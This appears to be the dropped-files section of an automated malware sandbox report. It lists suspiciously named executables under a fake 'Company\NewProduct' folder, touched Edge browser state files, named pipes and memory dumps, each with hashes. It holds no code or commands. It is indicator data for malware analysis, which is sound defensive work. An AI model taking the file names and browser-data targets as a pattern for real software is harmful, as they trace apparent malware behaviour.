ce94ce7de8279ecf9519b12f124543c3

SHA1
be2563e381439ed33869a052391eec1ddd40faa0

SHA256
f88d6fc5fd36ef3a9c54cf7101728a39a2a2694a0a64f6af1e1befacfbc03f20

SHA512
9697cfc31b3344a2929b02ecdf9235756f4641dbb0910e9f6099382916447e2d06e41c153fad50890823f068ae412fb9a55fd274b3b9c7929f2ca972112cc5b7

Download Submit
C:\Program Files (x86)\Company\NewProduct\jshainx.exe
Filesize
107KB

MD5
2647a5be31a41a39bf2497125018dbce

SHA1
a1ac856b9d6556f5bb3370f0342914eb7cbb8840

SHA256
84c7458316adf09943e459b4fb1aa79bd359ec1516e0ad947f44bdc6c0931665

SHA512
68f70140af2ad71a40b6c884627047cdcbc92b4c6f851131e61dc9db3658bde99c1a09cad88c7c922aa5873ab6829cf4100dc12b75f237b2465e22770657ae26

Download Submit
C:\Program Files (x86)\Company\NewProduct\jshainx.exe
Filesize
107KB

MD5
2647a5be31a41a39bf2497125018dbce

SHA1
a1ac856b9d6556f5bb3370f0342914eb7cbb8840

SHA256
84c7458316adf09943e459b4fb1aa79bd359ec1516e0ad947f44bdc6c0931665

SHA512
68f70140af2ad71a40b6c884627047cdcbc92b4c6f851131e61dc9db3658bde99c1a09cad88c7c922aa5873ab6829cf4100dc12b75f237b2465e22770657ae26

Download Submit
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
Filesize
757KB

MD5
3ec059bd19d6655ba83ae1e644b80510

SHA1
61fa49d4473e91509b32a3b675a236b1eab74d08

SHA256
7dc81dc72cb4f89ad022bb15419e1b6170cf77942b8ec29839924b7b4fe7896c

SHA512
5324c3a902b96d5782e01dd0bfb177055a6908112c60c85af49c7e863b62f0947d6e18d5ac370652008c5983b0c8bd762ab4444822d0ad547a88883970adabe9

Download Submit
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
Filesize
757KB

MD5
3ec059bd19d6655ba83ae1e644b80510

SHA1
61fa49d4473e91509b32a3b675a236b1eab74d08

SHA256
7dc81dc72cb4f89ad022bb15419e1b6170cf77942b8ec29839924b7b4fe7896c

SHA512
5324c3a902b96d5782e01dd0bfb177055a6908112c60c85af49c7e863b62f0947d6e18d5ac370652008c5983b0c8bd762ab4444822d0ad547a88883970adabe9

Download Submit
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
Filesize
107KB

MD5
bbd8ea73b7626e0ca5b91d355df39b7f

SHA1
66e298653beb7f652eb44922010910ced6242879

SHA256
1aa3fdc24e789b01a39944b85c99e4ac08864d2eae7530164cea2821acbf184e

SHA512
625cc9c108b4660030be1282493700e5f0ccfb973f466f61254ed1e1a96f5f042cdeaa94607825a2f694647468e2f525a6451542fe3aac785ebac1ccfe39864f

Download Submit
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
Filesize
107KB

MD5
bbd8ea73b7626e0ca5b91d355df39b7f

SHA1
66e298653beb7f652eb44922010910ced6242879

SHA256
1aa3fdc24e789b01a39944b85c99e4ac08864d2eae7530164cea2821acbf184e

SHA512
625cc9c108b4660030be1282493700e5f0ccfb973f466f61254ed1e1a96f5f042cdeaa94607825a2f694647468e2f525a6451542fe3aac785ebac1ccfe39864f

Download Submit
C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe
Filesize
1.7MB

MD5
63fd052610279f9eb9f1fee8e262f2a4

SHA1
aac344ed6f54c367be51effbf6e84128ee8c6992

SHA256
955c265a378008efee8f0d19c2880d1026f32f7cd6325e0ab1a24c833905bbba

SHA512
234bc89538336452938fbe1e6774f5f7ca47c735f871ac3ba54a3ea6b68c48970fc53239ea72d5ca176f3acc00932e479020c38cad66a0f70a3acda5b5aff9b9

Download Submit
C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe
Filesize
1.7MB

MD5
63fd052610279f9eb9f1fee8e262f2a4

SHA1
aac344ed6f54c367be51effbf6e84128ee8c6992

SHA256
955c265a378008efee8f0d19c2880d1026f32f7cd6325e0ab1a24c833905bbba

SHA512
234bc89538336452938fbe1e6774f5f7ca47c735f871ac3ba54a3ea6b68c48970fc53239ea72d5ca176f3acc00932e479020c38cad66a0f70a3acda5b5aff9b9

Download Submit
C:\Program Files (x86)\Company\NewProduct\real.exe
Filesize
275KB

MD5
a2414bb5522d3844b6c9a84537d7ce43

SHA1
56c91fc4fe09ce07320c03f186f3d5d293a6089d

SHA256
31f4715777f3be6a4a7b34baf25ebfc7af32dd9a2aae826fc73dca6c44fda173

SHA512
408ebb002b3bdb77dc243ced28d852801e68e5ff0dbfa450d3e91b89311fe6a3e8473e749619c285c1a5427d8a117350a3798435ed38b56d1a230f0ae270ec60

Download Submit
C:\Program Files (x86)\Company\NewProduct\real.exe
Filesize
275KB

MD5
a2414bb5522d3844b6c9a84537d7ce43

SHA1
56c91fc4fe09ce07320c03f186f3d5d293a6089d

SHA256
31f4715777f3be6a4a7b34baf25ebfc7af32dd9a2aae826fc73dca6c44fda173

SHA512
408ebb002b3bdb77dc243ced28d852801e68e5ff0dbfa450d3e91b89311fe6a3e8473e749619c285c1a5427d8a117350a3798435ed38b56d1a230f0ae270ec60

Download Submit
C:\Program Files (x86)\Company\NewProduct\safert44.exe
Filesize
246KB

MD5
414ffd7094c0f50662ffa508ca43b7d0

SHA1
6ec67bd53da2ff3d5538a3afcc6797af1e5a53fb

SHA256
d3fb9c24b34c113992c5c658f6a11f9620da2e49d12d1acabe871e1bea7846ee

SHA512
c6527077b4822c062e32c39be06e285916b501a358991d120a469f5da1e13d282685ca7ca3fa938292d5beef073fbea42ff9ba96fa5c395f057f7c964608a399

Download Submit
C:\Program Files (x86)\Company\NewProduct\safert44.exe
Filesize
246KB

MD5
414ffd7094c0f50662ffa508ca43b7d0

SHA1
6ec67bd53da2ff3d5538a3afcc6797af1e5a53fb

SHA256
d3fb9c24b34c113992c5c658f6a11f9620da2e49d12d1acabe871e1bea7846ee

SHA512
c6527077b4822c062e32c39be06e285916b501a358991d120a469f5da1e13d282685ca7ca3fa938292d5beef073fbea42ff9ba96fa5c395f057f7c964608a399

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
c42095d712260ad8342f05e06d48cd2e

SHA1
4ce0547a9bfcc5974025977f86dbe0b15fba4a42

SHA256
240655dceedbdf217925407140d7bffef45a23e70230522571ffcbbb9393b7a5

SHA512
97ee1ef3face9134739e3c0c6f55d9d3ed943cd7832569282e33a76759088cf3043c24ae964abedeb539d4eb81cfb752f3ed210cfe36ea67c96aa75dbf6ff7d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8a4282cfa562f1bf9e9cd1e821fe921f

SHA1
fe4cd79b58962e0d87cbf494b3a77d13e4f9b064

SHA256
c12068c8b28d2e65c0eea4a1e8b0e01c5879be74dbe3bda5a9a0cbdbc59f07d1

SHA512
ad4864e4b69439c3b65e8272359852d632eb98bd868c2224f40844ddea6554e925e72e0d5f1b2c0b4d327c9a359ca60cdee65bf5151ee7e2573b39c7a5ce71bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8a4282cfa562f1bf9e9cd1e821fe921f

SHA1
fe4cd79b58962e0d87cbf494b3a77d13e4f9b064

SHA256
c12068c8b28d2e65c0eea4a1e8b0e01c5879be74dbe3bda5a9a0cbdbc59f07d1

SHA512
ad4864e4b69439c3b65e8272359852d632eb98bd868c2224f40844ddea6554e925e72e0d5f1b2c0b4d327c9a359ca60cdee65bf5151ee7e2573b39c7a5ce71bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8a4282cfa562f1bf9e9cd1e821fe921f

SHA1
fe4cd79b58962e0d87cbf494b3a77d13e4f9b064

SHA256
c12068c8b28d2e65c0eea4a1e8b0e01c5879be74dbe3bda5a9a0cbdbc59f07d1

SHA512
ad4864e4b69439c3b65e8272359852d632eb98bd868c2224f40844ddea6554e925e72e0d5f1b2c0b4d327c9a359ca60cdee65bf5151ee7e2573b39c7a5ce71bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8a4282cfa562f1bf9e9cd1e821fe921f

SHA1
fe4cd79b58962e0d87cbf494b3a77d13e4f9b064

SHA256
c12068c8b28d2e65c0eea4a1e8b0e01c5879be74dbe3bda5a9a0cbdbc59f07d1

SHA512
ad4864e4b69439c3b65e8272359852d632eb98bd868c2224f40844ddea6554e925e72e0d5f1b2c0b4d327c9a359ca60cdee65bf5151ee7e2573b39c7a5ce71bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8a4282cfa562f1bf9e9cd1e821fe921f

SHA1
fe4cd79b58962e0d87cbf494b3a77d13e4f9b064

SHA256
c12068c8b28d2e65c0eea4a1e8b0e01c5879be74dbe3bda5a9a0cbdbc59f07d1

SHA512
ad4864e4b69439c3b65e8272359852d632eb98bd868c2224f40844ddea6554e925e72e0d5f1b2c0b4d327c9a359ca60cdee65bf5151ee7e2573b39c7a5ce71bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8a4282cfa562f1bf9e9cd1e821fe921f

SHA1
fe4cd79b58962e0d87cbf494b3a77d13e4f9b064

SHA256
c12068c8b28d2e65c0eea4a1e8b0e01c5879be74dbe3bda5a9a0cbdbc59f07d1

SHA512
ad4864e4b69439c3b65e8272359852d632eb98bd868c2224f40844ddea6554e925e72e0d5f1b2c0b4d327c9a359ca60cdee65bf5151ee7e2573b39c7a5ce71bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8a4282cfa562f1bf9e9cd1e821fe921f

SHA1
fe4cd79b58962e0d87cbf494b3a77d13e4f9b064

SHA256
c12068c8b28d2e65c0eea4a1e8b0e01c5879be74dbe3bda5a9a0cbdbc59f07d1

SHA512
ad4864e4b69439c3b65e8272359852d632eb98bd868c2224f40844ddea6554e925e72e0d5f1b2c0b4d327c9a359ca60cdee65bf5151ee7e2573b39c7a5ce71bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8a4282cfa562f1bf9e9cd1e821fe921f

SHA1
fe4cd79b58962e0d87cbf494b3a77d13e4f9b064

SHA256
c12068c8b28d2e65c0eea4a1e8b0e01c5879be74dbe3bda5a9a0cbdbc59f07d1

SHA512
ad4864e4b69439c3b65e8272359852d632eb98bd868c2224f40844ddea6554e925e72e0d5f1b2c0b4d327c9a359ca60cdee65bf5151ee7e2573b39c7a5ce71bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8a4282cfa562f1bf9e9cd1e821fe921f

SHA1
fe4cd79b58962e0d87cbf494b3a77d13e4f9b064

SHA256
c12068c8b28d2e65c0eea4a1e8b0e01c5879be74dbe3bda5a9a0cbdbc59f07d1

SHA512
ad4864e4b69439c3b65e8272359852d632eb98bd868c2224f40844ddea6554e925e72e0d5f1b2c0b4d327c9a359ca60cdee65bf5151ee7e2573b39c7a5ce71bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
8a4282cfa562f1bf9e9cd1e821fe921f

SHA1
fe4cd79b58962e0d87cbf494b3a77d13e4f9b064

SHA256
c12068c8b28d2e65c0eea4a1e8b0e01c5879be74dbe3bda5a9a0cbdbc59f07d1

SHA512
ad4864e4b69439c3b65e8272359852d632eb98bd868c2224f40844ddea6554e925e72e0d5f1b2c0b4d327c9a359ca60cdee65bf5151ee7e2573b39c7a5ce71bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
a733b3e56a439e3f3e0fe391639178c0

SHA1
885e8dcc2e9255dbd3efc529cdd38c4d48f75480

SHA256
1ea6514b76ad4db1ef1f8adac1d84748a5bdeff67631b31f39555a00bfa62dc2

SHA512
edbf2117ccf2584c20c3df9ce84cb6de194267c5adfb11406cbdd03f0b4313007166a5e25b7dc876193426d3f6772b0a2125e74b7d622d3fe3353e8b1815d055

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
d70485d3a6bc7305d3c8939ff697b218

SHA1
a748695e88db02190f7ef52c36cc97bb656f57bd

SHA256
0d5673e9c02c9f40221a218568f0cc09e57e6a4be166f5e6d95aec8fe9c9d48d

SHA512
b39888e68a08502cb7d3e4833d6c13000db5c565e24bbe3f6887d50370ff3afad6eeaf709c17c30b0aacd339db1ee5ad3a7526c4d1cf9f46388a3e8ed1831d4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
e2c4bb9829bcdd8cf893a61c3685631f

SHA1
1a890cc135fd87a2a2d9009a6c364fa96119c26a

SHA256
ba4c321d424e72f43a7afc38a6bddbd3e6bbc4f3bb8dbc85d1e717bcb4d6209a

SHA512
d154ed7ec2fb1aa150ad0f7880c6903acb2c8d7a3bd53dc29b8ce4e9a2ff6adf2d8066caff20459d8d894de7c817c579fa9d15265ff6f2675663db0528b04746

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
dd29c8fb37d9d6d95851200e1ee7102e

SHA1
d2f5d4fe4adae0ff2f60b8141bd87b353d884f24

SHA256
f8f2f9e66225e0e8183d22163d396ed9190d6e3cdc46c27b44e64305e25ce984

SHA512
c3046af096b3fd44844d67ab0df59813dc701972cf04d2a31e1a5b3ba15a2a473ab34092fa0be55a28eba9b6254bdfc30d03c718dc00d9134d033ddf1c15f576

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
94ae6167906df2e1881b2b275c462c9d

SHA1
425c7456e60ad377b15a1d9ff4e771a9502c16ce

SHA256
b9ac821ae78cb36312ec317d9d37886d2ce431c58787d2aa0dbd88df8ae520ec

SHA512
550acfc0182bffe09caec7f55d9e46267248d46439926256cac7ca9caadb4f69439b710808f2d476a6d866c8fe207433bd7133ec5cc192a9d3fec9c2026bbf62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
a733b3e56a439e3f3e0fe391639178c0

SHA1
885e8dcc2e9255dbd3efc529cdd38c4d48f75480

SHA256
1ea6514b76ad4db1ef1f8adac1d84748a5bdeff67631b31f39555a00bfa62dc2

SHA512
edbf2117ccf2584c20c3df9ce84cb6de194267c5adfb11406cbdd03f0b4313007166a5e25b7dc876193426d3f6772b0a2125e74b7d622d3fe3353e8b1815d055

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
b3f271ddd5d3f8f7df4098865f39382c

SHA1
1c2e29896b4ac562a31b508305177f9125ee4287

SHA256
5dfa4aed057f5341b45d54bd314bcd5cd5fa09c795ffb8a55e77270d16926ea5

SHA512
20bf292706d07fa2181063e819ae5a22e5ebeb679ce0ec16ca4ca853bf99d2d841c4ca3ca28d3b9ca04d4acf22c35fd7a91916cda11f68ff3fb70594a5a088cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
e2c4bb9829bcdd8cf893a61c3685631f

SHA1
1a890cc135fd87a2a2d9009a6c364fa96119c26a

SHA256
ba4c321d424e72f43a7afc38a6bddbd3e6bbc4f3bb8dbc85d1e717bcb4d6209a

SHA512
d154ed7ec2fb1aa150ad0f7880c6903acb2c8d7a3bd53dc29b8ce4e9a2ff6adf2d8066caff20459d8d894de7c817c579fa9d15265ff6f2675663db0528b04746

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
2KB

MD5
a2d5614b3250608764d001a104aec938

SHA1
e7ec34e07bbe03f80a695d50bf4c0be048762c75

SHA256
5bf896545401341e89d5c8d21b88ab305b1d2c38676d39570b0e02cecbb1900c

SHA512
481c3926cd6695ba5be24c9639ff53f6e12022e642c9cb023b34e3b308ebf9a8f2dd47eb38455277e9e69dc798a5916d6b792b96a0ed989fa324290f598d9d9d

Download Submit
\??\pipe\LOCAL\crashpad_1540_IKOMNVTIWEFIPRWI
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_224_VUPZRHSIHBPKRUTL
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_4184_STILCJXBDTPFAIAF
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_4940_ZZMPTFYKNNYQTWYC
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_5056_NNJERLHWJXZVDYEH
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_524_YOPORBIWZDGUSAXY
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_824_CXGXHLHQXWEBXOHC
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/224-142-0x0000000000000000-mapping.dmp

Download
memory/380-136-0x0000000000000000-mapping.dmp

Download
memory/524-135-0x0000000000000000-mapping.dmp

Download
memory/544-138-0x0000000000000000-mapping.dmp

Download
memory/816-314-0x0000000000000000-mapping.dmp

Download
memory/824-145-0x0000000000000000-mapping.dmp

Download
memory/1156-162-0x0000000000000000-mapping.dmp

Download
memory/1196-359-0x00000000022D5000-0x0000000002AA7000-memory.dmp

Filesize
7.8MB

Download
memory/1196-356-0x00000000022D5000-0x0000000002AA7000-memory.dmp

Filesize
7.8MB

Download
memory/1196-360-0x0000000002AB0000-0x0000000002C3C000-memory.dmp

Filesize
1.5MB

Download
memory/1196-365-0x0000000002760000-0x000000000286C000-memory.dmp

Filesize
1.0MB

Download
memory/1196-367-0x0000000002720000-0x0000000002732000-memory.dmp

Filesize
72KB

Download
memory/1196-366-0x0000000002760000-0x000000000286C000-memory.dmp

Filesize
1.0MB

Download
memory/1196-357-0x0000000002AB0000-0x0000000002C3C000-memory.dmp

Filesize
1.5MB

Download
memory/1196-371-0x0000000002760000-0x000000000286C000-memory.dmp

Filesize
1.0MB

Download
memory/1276-273-0x0000000000000000-mapping.dmp

Download
memory/1288-181-0x0000000000000000-mapping.dmp

Download
memory/1376-143-0x0000000000000000-mapping.dmp

Download
memory/1524-278-0x0000000000000000-mapping.dmp

Download
memory/1540-140-0x0000000000000000-mapping.dmp

Download
memory/1688-262-0x0000000000000000-mapping.dmp

Download
memory/1748-227-0x0000000000000000-mapping.dmp

Download
memory/2012-149-0x0000000000000000-mapping.dmp

Download
memory/2016-185-0x0000000000000000-mapping.dmp

Download
memory/2036-193-0x0000000000000000-mapping.dmp

Download
memory/2128-342-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/2128-285-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/2128-163-0x0000000000000000-mapping.dmp

Download
memory/2128-284-0x000000000054C000-0x000000000055D000-memory.dmp

Filesize
68KB

Download
memory/2128-252-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/2128-248-0x000000000054C000-0x000000000055D000-memory.dmp

Filesize
68KB

Download
memory/2128-250-0x00000000004B0000-0x00000000004C0000-memory.dmp

Filesize
64KB

Download
memory/2164-195-0x0000000000000000-mapping.dmp

Download
memory/2252-377-0x0000000000A20000-0x0000000000A2C000-memory.dmp

Filesize
48KB

Download
memory/2252-378-0x0000000000A20000-0x0000000000A2C000-memory.dmp

Filesize
48KB

Download
memory/2448-276-0x0000000005B50000-0x0000000005BE2000-memory.dmp

Filesize
584KB

Download
memory/2448-315-0x0000000007C00000-0x0000000007C50000-memory.dmp

Filesize
320KB

Download
memory/2448-177-0x0000000000000000-mapping.dmp

Download
memory/2448-196-0x0000000000AC0000-0x0000000000AE0000-memory.dmp

Filesize
128KB

Download
memory/2448-243-0x0000000007960000-0x000000000799C000-memory.dmp

Filesize
240KB

Download
memory/2996-139-0x0000000000000000-mapping.dmp

Download
